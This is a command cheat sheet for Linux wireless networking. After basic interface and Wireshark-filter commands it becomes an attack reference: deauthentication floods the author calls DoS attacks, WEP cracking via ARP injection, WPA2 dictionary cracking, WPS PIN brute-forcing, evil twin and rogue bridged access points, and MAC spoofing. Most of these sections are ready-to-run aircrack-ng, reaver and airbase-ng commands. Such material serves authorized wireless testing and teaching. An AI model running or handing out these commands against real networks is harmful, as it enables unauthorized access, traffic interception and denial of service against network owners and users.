Displays all tcp connections (-t option) with resolving hosts' names turned off (-n option):
netstat -nt
Displays all ports list which the computer is listening on (only tcp connections and no hosts' names resolving):
netstat -ntl
Turns on packets forwarding between various networks (turns on router functionality):
sysctl -w net.ipv4.ip_forward
Scanning for wi-fi networks accessible for wlan0 interface:
iw dev wlan0 scan
Displays information about wi-fi network which the wlan0 inteface is connected to:
iw dev wlan0 link
Connects to specified unprotected wi-fi network:
iw wlan0 connect network_name
Displays wireless network interfaces list:
iwconfig
Activates wlan0 network interface:
ifconfig wlan0 up
Displays status of wlan0 network interface:
ifconfig wlan0
Displays detailed information on access points found:
iwlist wlan0 scanning
Connects to unprotected wifi network:
iwconfig wlan0 essid "my network"
Connects to WEP-protected wifi network:
iwconfig wlan0 essid "my network" key haslo_WEP_do_sieci
To connect to WPA-protected wifi network, you have to use WPA_supplicant and its configuration files:
network={
ssid="my network"
key_mgmt=WPA-PSK
proto=WPA
pairwise=TKIP
group=TKIP
psk="password_to_WPA_protected_wifi"
}wpa_supplicant -D wext -i wlan0 -c wpa_network.conf
After connecting to a wifi network you can use command below to obtain an IP address in the network:
dhcpclient3 wlan0
Displays routing table without resolving host names:
route -n
Lists all wifi adapters that can work in the monitor mode:
airmon-ng
Switches chosen wifi adapter to work in monitor mode:
airmon-ng start wlan0
If the program displays an information that the switching was impossible because of some processes running (the processes
will be listed together with theirs PID-s), then execute command:
airmon-ng check kill
The command will kill them. Next try once again to switch wifi adapter to work in monitor mode. This time the attempt
should be successful, you can confirm that by the command
airmon-ng
It will show information about the new monitor interface created:
wlan0mon
Switches off monitor mode on the interface:
airmon-ng stop wlan0mon
To be able to intercept packets in the Wireshark application you should run it as the root. Next click the menu
Capture -> Interfaces...
and in the dialog box shown select interface you want to monitor and click Start button.
To make Wireshark to show only management frames you should fill a Filter entry with condition as below:
wlan.fc.type == 0
and press Apply button.
To make Wireshark to show only control frames you should fill a Filter entry with condition as below:
wlan.fc.type == 1
To make Wireshark to show only data frames you should fill a Filter entry with condition as below:
wlan.fc.type == 2
To display only frames of specified type and subtype - for example control frames of Beacon subtype - you should enter condition:
(wlan.fc.type == 0) && (wlan.fc.subtype == 8)
Frames Probe Request:
(wlan.fc.type == 0) && (wlan.fc.subtype == 4)
Frames Probe Response:
(wlan.fc.type == 0) && (wlan.fc.subtype == 5)
Frames Deauthentication:
(wlan.fc.type == 0) && (wlan.fc.subtype == 0x0c)
Frames Reassociation Request:
(wlan.fc.type == 0) && (wlan.fc.subtype == 2)
Frames Reassociation Response:
(wlan.fc.type == 0) && (wlan.fc.subtype == 3)
If you want to reveal hidden wifi networks you should monitor Probe Request/Probe Respons frames. They are sent just before
making a connection and they contain hidden SSID in plain text.
Displays frames that are sent/received by an interface of specified mac address:
wlan.addr == cc:cc:cc:cc:cc:cc
Displays all frames but the Beacon ones that are sent/received by an interface of specified mac address:
(wlan.addr==00:14:bf:8f:b1:f5) && !(wlan.fc.type_subtype==0x08)
To make a filter basing on appropriate selection in the frame details in the Wireshark, you should right-click chosen field and from the context menu select option: Apply as Filter -> Selected. This causes the Filter entry to fill in with proper condition.
Displays information (ex. signal strength, channel, cipherment) about access point of specified mac address:
airodump-ng --bssid 70:62:b8:65:c8:58 wlan0mon
As in command above, but only 2-nd channel is monitored and there are listed only wifi clients connected to the specified access point:
airodump-ng -c 2 -a --bssid 70:62:b8:65:c8:58 wlan0mon
Writes communication between specified access point and wifi clients in files of name beginning with "keystream" or "WEPCrack" word:
airodump-ng wlan0mon -c 2 --bssid 70:62:b8:65:c8:58 -w keystream
or
airodump-ng wlan0mon --bssid 00:14:BF:B1:52:DE --channel 11 --write WEPCrack
Making the wifi interface to work on a specified (10) channel:
iwconfig wlan0mon channel 10
Wireshark filter which displays only packets sent/received by a specified access point:
wlan.bssid == 70:62:b8:65:c8:58
Wireshark filter which displays only data packets sent/received by a specified access point:
(wlan.bssid == 70:62:b8:65:c8:58) && (wlan.fc.type_subtype == 0x20)
Wireshark filter which displays all packets sent/received by a specified access point but the broadcast ones (Beacon):
(wlan.bssid == 70:62:b8:65:c8:58) && !(wlan.fc.type_subtype == 0x08)
Injects packets to specified access point (with the ESSID and mac address given):
aireplay-ng -9 -e Linksys -a 70:62:b8:65:c8:58 wlan0mon
Sends in the name of specified access point (with given mac address) Deauthentication packets what will make wifi clients
to disconnect and connect once again:
aireplay-ng -0 5 -a 70:62:b8:65:c8:58 wlan0mon
aireplay-ng -0 5 -a 70:62:b8:65:c8:58 --ignore-negative-one wlan0mon
As above but Deauthentication packets are sent to the specified (-c option) wireless client. This is a demo of DoS attack:
aireplay-ng -0 35 -a 00:14:BF:B1:52:DE -c 00:14:BF:8F:B1:F5 wlan1mon
Sends in the name of specified access point (with given mac address after -a option) Deauthentication packets until CONTROL+C
is pressed. This is a DoS attack for all wifi clients that try to connect to the access point:
aireplay-ng -0 0 -a 00:14:BF:B1:52:DE --ignore-negative-one wlan1mon
Uses - catched in the file keystream...xor file - stream of WEP key to authenticate at specified (after -a option) access point.
The command uses a mac address specified after -h option as a mac address of the client:
aireplay-ng -1 0 -e Linksys -y keystream-70:62:b8:65:c8:58.xor -a 70:62:b8:65:c8:58 -h cc:cc:cc:cc:cc:cc wlan0mon
Injects ARP packets (-3 option) in the name of specified wifi client (-h option) to a wireless network with the specified
access point (-b option):
aireplay-ng -3 -b 00:14:BF:B1:52:DE -h 00:14:BF:8F:B1:F5 wlan0mon
Cracking WEP key:
aircrack-ng WEPCrack-01.cap
Changes default law stipulation settings for the wifi network card to the specified country (Poland, the United States):
iw reg set PL
iw reg set US
Sets specified mac address for a wlan0 interface:
macchanger -m <mac> wlan0
In Wireshark packets - from a *.cap file or cathed ones - that are responsible for the authentication have in a column Protocol value of EAPOL and in a column Info string like "Key (Message 1 of 4)".
Dictionary cracking of a WPA2 passwords:
aircrack-ng linksys-01.cap -w file_with_passwords.txt
Speeds up dictionary cracking by computing PMK keys for a given SSID (and only for it):
genpmk -f dictionary_file.txt -d computed_PMK_keys.txt -s Linksys
Uses computed PMK keys to guess password:
cowpatty -d computed_PMK_keys.txt -s Linksys -r linksys-01.cap
To be able to use generated by genpmk command file containing PMK keys in aircrack-ng program,
you have to convert it to appropriate format:
airolib-ng PMK_for_aircrack.txt --import cowpatty computed_PMK_keys.txt
Next use command:
aircrack-ng -r PMK_for_aircrack.txt linksys-01.cap
Deciphers catched WEP packets:
airdecap-ng -w found_wep_key WEPCrack-01.cap
Deciphers catched WPA/WPA2 PSK packets:
airdecap-ng -p password_found WPACrack-01.cap -e Linksys
Creates an evil twin access point - an AP that imitates an already existing AP (linksys_devel) which works on channel 11.
Created in this way AP has ESSID equal to "default" periodically switching to "linksys_devel". To the AP will conect
the nearest wifi clients:
airbase-ng --essid linksys_devel -c 11 wlan1mon
As above but it creates more difficult to detect evil twin - the one which has also an identical mac address as the original AP.
However from my tests results that it is more difficult to make wifi clients connects to the AP:
airbase-ng -a 00:14:BF:B1:52:DE --essid linksys_devel -c 11 wlan1mon
Creates an access point without the cyphering:
airbase-ng --essid linksys_devel -a 11:11:11:11:11:11 -c 11 wlan1mon
Creates a WEP protected access point:
airbase-ng --essid linksys_devel -a 22:22:22:22:22:22 -c 11 -W 1 wlan1mon
Creates a WPA PSK protected access point:
airbase-ng --essid linksys_devel -a 33:33:33:33:33:33 -c 11 -W 1 -z 2 wlan1mon
Creates a WPA2 PSK protected access point:
airbase-ng --essid linksys_devel -a 44:44:44:44:44:44 -c 11 -W 1 -Z 2 wlan1mon
Detects access points that run WPS protocol:
wash --ignore-fcs -i wlan0mon
Cracking WPS PIN using brute-force method:
reaver -i wlan0mon -b 11:22:33:44:55:66 -vv
Monitoring in the terminal packets of type "Probe request":
tshark -n -i wlan0mon subtype probereq
Monitoring in the terminal packets of type "Probe request", outputed data contain only mac address of the client and
an SSID of an access point:
tshark -n -i wlan0mon subtype probereq -T fields -e separator= -e wlan.sa -e wlan_mgt.ssid
How to configure a non-authorizated access point:
airmon-ng start wlan0
airbase-ng --essid Test -c 11 wlan0mon
apt-get install bridge-utils
brctl addbr my-bridge
brctl addif my-bridge at0
brctl addif my-bridge eth1
ifconfig at0 0.0.0.0 up
ifconfig eth1 0.0.0.0 up
ifconfig my-bridge 192.168.0.180 up
echo 1 > /proc/sys/net/ipv4/ip_forward
ip route del default
ip route add default via 192.168.0.1
The process of cracking WEP key:
airodump-ng wlan0mon --bssid 00:14:BF:B1:52:DE --channel 11 --write WEPCrack
aireplay-ng -3 -b 00:14:BF:B1:52:DE -h 00:14:BF:8F:B1:F5 wlan0mon
aircrack-ng WEPCrack-01.cap